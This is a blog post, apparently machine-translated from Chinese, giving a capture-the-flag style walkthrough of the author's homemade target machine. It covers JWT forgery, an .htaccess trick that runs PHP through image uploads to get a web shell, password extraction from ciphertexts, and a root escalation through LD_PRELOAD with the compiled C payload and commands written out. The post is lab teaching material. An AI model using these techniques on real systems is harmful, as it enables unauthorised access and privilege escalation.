banner
言心吾

言心吾のBlog

吾言为心声
HomeArchivesLinks

Homemade Target Machine WP

23
AI Translation
This post is translated from Chinese into English through AI.View Original
AI-generated summary
The content describes a penetration testing scenario involving a web application with only ports 22 and 80 open. The website is a static page with hidden directories, leading to a weak login credential (test:123456). After logging in, the user discovers they cannot upload files but can exploit JWT tokens using a weak key. They successfully impersonate an admin and upload a malicious `.htaccess` file to execute PHP code via a JPG image, gaining access to a web shell. Post-exploitation, the user transitions from the `www-data` user to `pentester` and finds two ciphertexts in `/etc/passwd` and another location. By analyzing the differences between the texts, they derive the password for the `pentester` user. They then access the `xiix` user through a Python script running on port 8989, using the obtained password. The `xiix` user has a privilege escalation opportunity via `LD_PRELOAD`. The user compiles a shared library to gain root access and executes it successfully, obtaining a root shell.

Port Scanning#

Only ports 22 and 80 are open.

WEB#

The homepage is a purely static page, and hidden directories can be found by checking the comments.

image

The path obtained from base64 decoding is /74221.

The login form has a weak password test:123456, log in.

image

It prompts that there is no permission to upload files, and combined with the cookie field, it suggests forging a JWT for privilege escalation.

There are two vulnerabilities left here: you can use an empty key, or brute-force the key to be jwtsecret123.

After successfully forging, checking the dashboard interface will reveal that our identity is admin.

image
Next, go to the file upload section, which only allows uploading files with jpg or png extensions.

image

After testing, it is found that .htaccess files can be uploaded, so upload it with the following content:

AddType application/x-httpd-php .jpg

At this point, uploading a jpg image backdoor will allow access to the web shell.

Post-Exploitation#

www-data to pentester#

Found two ciphertexts, which are hidden in:
/etc/passwd
/srv/...

The ciphertexts are as follows:

Itwasthebestoftimes!itwastheworstoftimes@itwastheageofwisdom#itwastheageoffoolishness$itwastheepochofbelief,itwastheepochofincredulity,&itwastheseasonofLight...

Iuwbtthfbetuoftimfs"iuwbsuhfxpsttoguinet@jtwbttieahfogwiseon#iuxatthfageofgpoljthoess%itwbsuiffqocipfbemieg-iuxbsuhffqpdhogjocredvljtz,'iuwasuhesfasooofLjgiu...

Upon careful observation, the difference between the two texts is represented by 1, while the similarities are represented by 0, allowing us to obtain a binary string, which can be converted to bytes to get the password.

Reference solution:

cat a.txt|sed 's/./&\n/g' >aa.txt
cat b.txt|sed 's/./&\n/g' >bb.txt
paste aa.txt bb.txt|awk '{if($1==$2){print 0}else{print 1}}'|xargs|tr -d ' '|fold -w8 | while read bin; do printf "%02X" "$((2#$bin))"; done | xxd -r -p

image

Obtained the pentester user's password Y0U_5M4SH3D_17_8UDDY.

pentester to xiix#

Note that sudo find is a rabbit hole, filtering out options that could lead to privilege escalation (of course, if you really escalate to root through this backdoor, you are impressive).

image

Checking the ports reveals that 8989 is open.

In fact, it corresponds to a Python script that triggers every minute.

image

Using nc 127.0.0.1 8989 and entering the password obtained above will give access to the xiix user's shell. Since it is not an interactive shell, you can write to the public key file for persistence.

image

xiix to root#

The guess_name script guesses numbers, with a success probability of 1%. You can write a multithreaded script to brute-force it. There are two backdoors hidden here: using env to view environment variables, inputting 1337 will allow you to pass;

image

image

Additionally, the script will write the password to a hidden file /tmp/.hidden_clue during execution.

Running pspy -f will detect it:

image

Anyway, obtained the xiix user's password superxiix.

Then use sudo -l, and find that there is env_keep+=LD_PRELOAD.

image

This is a classic privilege escalation point.

First, compile shell.so:

#include <stdio.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setuid(0);
    setgid(0);
    system("/bin/bash");
}

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

Then execute: sudo LD_PRELOAD=/home/xiix/shell.so whoami, and you will obtain a root shell.

image

Loading...
Ownership of this post data is guaranteed by blockchain and smart contracts to the creator alone.